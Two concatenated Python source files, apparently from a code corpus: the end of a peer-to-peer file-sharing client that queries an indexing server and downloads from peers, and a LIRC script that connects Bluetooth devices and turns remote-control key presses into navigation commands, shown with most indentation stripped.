if i == 0:
break
elif i > 0 and i <= len(peer_list):
peer_addr = peer_list[i-1].split(":")
download_addr = (peer_addr[0], int(peer_addr[1])+1)
downloadFile(download_addr, query_file)
break
else:
print("Wrong index please try again")
else:
print("Invalid input please try again")
else:
print("No peers found for the file.")
user_input = input("> ")
user_input = user_input.split(" ")
action = user_input[0]
isvalid = True
if action == "QUERY" and len(user_input) > 1:
conn.send(json.dumps({"action": "QUERY", "file": user_input[1]}).encode(FORMAT))
elif action == "WAIT":
print("Start waiting")
time.sleep(1)
isvalid = False
elif action == "EXIT":
break
else:
print("Input action is invalid!")
isvalid = False
print("Disconnected from the server.")
conn.close()
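# Illustrative note (not part of the original script): the JSON messages
# exchanged with the indexing server above look roughly like this. The exact
# "msg" text of "OK" replies depends on the server.
#
#   peer -> server: {"action": "REGISTER", "filelist": ["a.txt", "b.txt"]}
#   peer -> server: {"action": "UPDATE",   "filelist": ["a.txt"]}
#   peer -> server: {"action": "QUERY",    "file": "a.txt"}
#   server -> peer: {"type": "OK",        "msg": "..."}
#   server -> peer: {"type": "QUERY-RES", "file": "a.txt", "msg": ["host:port", ...]}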
@click.command()
@click.argument('port')
@click.option('--dir',
default="./",
help='Serving directory relative to current directory')
@click.option('--server',
default="127.0.0.1:5000",
help='Indexing server address')
def main(port, dir, server):
target_dir = os.path.join(os.getcwd(), dir)
os.chdir(target_dir)
port = int(port)
localhost = socket.gethostbyname(socket.gethostname())
client_bind_addr = (localhost, port)
server_addr = server.split(":")
server_addr = (server_addr[0], int(server_addr[1]))
connectIndexingServer(client_bind_addr, server_addr)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
control_lirc.py
|
import bluetooth
from control_artik import *
import logging
import socket
import string
import subprocess
import sys
import time
import threading
FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(format=FORMAT, level=logging.DEBUG)
class ControlLirc(object):
def __init__(self):
self.connected = False
self.sock = None
self.socket_path = "/var/run/lirc/lircd"
self.button_delay = 0.25
def close(self):
    self.sock.close()
    sys.exit()
def isConnected(self):
nearby_devices = bluetooth.discover_devices(duration=8, lookup_names=True, flush_cache=True)
for addr, name in nearby_devices:
output, error = subprocess.Popen("echo 'info %s\nquit' | bluetoothctl" % (addr), shell=True,
stdout=subprocess.PIPE).communicate()
if output.find("Connected: yes") == -1:
subprocess.call("echo 'connect %s\nquit' | bluetoothctl" % (addr), shell=True)
if not self.connected:
self.tryConnection()
threading.Thread(target=self.monitor).start()
return self.connected
def connectEventLircd(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.socket_path)
def tryConnection(self):
try:
self.connectEventLircd()
self.connected = True
logging.info("connected to Lirc-Socket on %s" % self.socket_path)
# self.monitor()
except socket.error as msg:
logging.error("connection error %s" % msg)
self.connected = False
def monitor(self):
while self.connected:
try:
buf = self.sock.recv(128)
if not buf:
self.sock.close()
except:
logging.error("monitoring error ", sys.exc_info()[0])
self.sock.close()
lines = string.split(buf, "\n")
for line in lines[:-1]:
code, count, cmd, device = string.split(line, " ")[:4]
if count == "0":
if cmd == "KEY_UP":
send_up()
time.sleep(self.button_delay)
elif cmd == "KEY_DOWN":
send_down()
time.sleep(self.button_delay)
elif cmd == "KEY_LEFT":
send_left()
time.sleep(self.button_delay)
elif cmd == "KEY_RIGHT":
send_right()
time.sleep(self.button_delay)
elif cmd == "KEY_HOME":
send_home()
time.sleep(self.button_delay)
|